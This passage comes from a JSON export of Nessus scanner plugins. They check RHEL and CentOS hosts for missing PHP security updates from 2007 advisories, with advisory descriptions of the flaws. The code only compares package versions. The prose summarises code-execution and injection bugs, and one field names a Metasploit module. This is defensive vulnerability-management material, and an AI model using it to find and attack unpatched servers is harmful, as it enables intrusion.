(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0155\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:16", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-10T00:00:00", "published": "2007-04-19T00:00:00", "id": "CENTOS_RHSA-2007-0155.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25043", "title": "CentOS 3 / 4 : php (CESA-2007:0155)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0155 and \n# CentOS Errata and Security Advisory 2007:0155 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25043);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0155\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2007:0155)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013669.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5aa1da2d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013672.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?00b4b6bf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013677.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b57e934e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013678.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84a6c30c\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013682.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05af58a3\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013683.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2d68f08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:17", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-10T00:00:00", "published": "2007-04-30T00:00:00", "id": "CENTOS_RHSA-2007-0153.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25095", "title": "CentOS 5 : php (CESA-2007:0153)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0153 and \n# CentOS Errata and Security Advisory 2007:0153 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25095);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_bugtraq_id(23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0153\");\n\n script_name(english:\"CentOS 5 : php (CESA-2007:0153)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013694.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20c5e27f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013695.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1cf75bb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-common-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xml-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:20", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-05-25T00:00:00", "id": "REDHAT-RHSA-2007-0153.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25325", "title": "RHEL 5 : php (RHSA-2007:0153)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0153. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25325);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_bugtraq_id(23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0153\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0153)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1001\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0153\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", 